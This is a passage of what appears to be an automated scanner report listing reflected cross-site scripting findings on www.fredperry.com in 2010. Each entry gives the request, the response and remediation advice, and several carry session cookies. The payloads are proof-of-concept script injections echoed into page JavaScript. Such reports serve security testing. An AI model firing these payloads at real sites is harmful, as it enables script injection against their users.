The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6784a"-alert(1)-"467c737cd18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home/?6784a"-alert(1)-"467c737cd18=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/home/?6784a"-alert(1)-"467c737cd18=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c636"-alert(1)-"401eb60e513 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js1c636"-alert(1)-"401eb60e513/index.php HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:48 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=8m0oqsmc1sc72tf5e0msm0em36; expires=Tue, 09-Nov-2010 17:15:48 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/js1c636"-alert(1)-"401eb60e513/index.php"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efe09"-alert(1)-"3736105445 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /kidsefe09"-alert(1)-"3736105445/kidswear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:24:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=kp6jr7pki4in7iu19bvd9202h2; expires=Tue, 09-Nov-2010 17:24:23 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/kidsefe09"-alert(1)-"3736105445/kidswear/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4731"-alert(1)-"b278de41763 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /kids/kidsweard4731"-alert(1)-"b278de41763/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:24:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=gds6c6cpusu9o67aien66qr4r4; expires=Tue, 09-Nov-2010 17:24:36 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/kids/kidsweard4731"-alert(1)-"b278de41763/"); //]]> ...[SNIP]...
1.73. http://www.fredperry.com/kids/kidswear/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/kids/kidswear/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 561cd"-alert(1)-"d72a8d8d292 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /kids/kidswear/?561cd"-alert(1)-"d72a8d8d292=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 288b4"-alert(1)-"8dbdc0fd791 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /kids288b4"-alert(1)-"8dbdc0fd791/my-first-fred-perry-shirt-overview/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:19:15 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=ndi6tjig427j9ttkm97l8sv4g2; expires=Tue, 09-Nov-2010 17:19:15 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/kids288b4"-alert(1)-"8dbdc0fd791/my-first-fred-perry-shirt-overview/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cfd0"-alert(1)-"3724550e2d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /kids/my-first-fred-perry-shirt-overview9cfd0"-alert(1)-"3724550e2d6/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:19:39 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=ebbbjs2q6b6v1n8qrime7tb331; expires=Tue, 09-Nov-2010 17:19:39 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/kids/my-first-fred-perry-shirt-overview9cfd0"-alert(1)-"3724550e2d6/"); //]]> ...[SNIP]...
1.76. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/kids/my-first-fred-perry-shirt-overview/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c166e"-alert(1)-"1986b134245 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /kids/my-first-fred-perry-shirt-overview/?c166e"-alert(1)-"1986b134245=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b402"-alert(1)-"7cd71f3fd4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition1b402"-alert(1)-"7cd71f3fd4a/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:05:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=mcf7qrdktlf5aa5olcbmpu7l76; expires=Tue, 09-Nov-2010 17:05:21 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition1b402"-alert(1)-"7cd71f3fd4a/"); //]]> ...[SNIP]...
1.78. http://www.fredperry.com/limited-edition/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7777c"-alert(1)-"313f3d97d63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/?7777c"-alert(1)-"313f3d97d63=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1808"-alert(1)-"761be49e7f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-editionb1808"-alert(1)-"761be49e7f3/men/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:05:59 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=r7of708qtgn1vt8bnn8uboqkk2; expires=Tue, 09-Nov-2010 17:05:59 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-editionb1808"-alert(1)-"761be49e7f3/men/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 988e5"-alert(1)-"b11ab3c0675 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men988e5"-alert(1)-"b11ab3c0675/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:06:13 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=hu1d1s8la6ui695fjj2imvb9n5; expires=Tue, 09-Nov-2010 17:06:13 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men988e5"-alert(1)-"b11ab3c0675/"); //]]> ...[SNIP]...
1.81. http://www.fredperry.com/limited-edition/men/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/men/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64480"-alert(1)-"2f0f4002ef1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/?64480"-alert(1)-"2f0f4002ef1=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aebc"-alert(1)-"8415b8659b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition6aebc"-alert(1)-"8415b8659b8/men/accessories/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:13:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=t572mchn82lsgdjpraivc9hmj7; expires=Tue, 09-Nov-2010 17:13:46 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition6aebc"-alert(1)-"8415b8659b8/men/accessories/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1880"-alert(1)-"89b8cefdcb5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/menf1880"-alert(1)-"89b8cefdcb5/accessories/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:14:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=l7gmp8pmt6tvlpnvuprf1qioh3; expires=Tue, 09-Nov-2010 17:14:16 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/menf1880"-alert(1)-"89b8cefdcb5/accessories/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bdf6"-alert(1)-"0c2e6e325d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/accessories7bdf6"-alert(1)-"0c2e6e325d1/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:14:33 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=5ou6pdoglafg1dha16j5t94qk7; expires=Tue, 09-Nov-2010 17:14:33 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/accessories7bdf6"-alert(1)-"0c2e6e325d1/"); //]]> ...[SNIP]...
1.85. http://www.fredperry.com/limited-edition/men/accessories/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/men/accessories/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af85e"-alert(1)-"f0ac6225e38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/accessories/?af85e"-alert(1)-"f0ac6225e38=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/accessories/?af85e"-alert(1)-"f0ac6225e38=1"); //]]> ...[SNIP]...
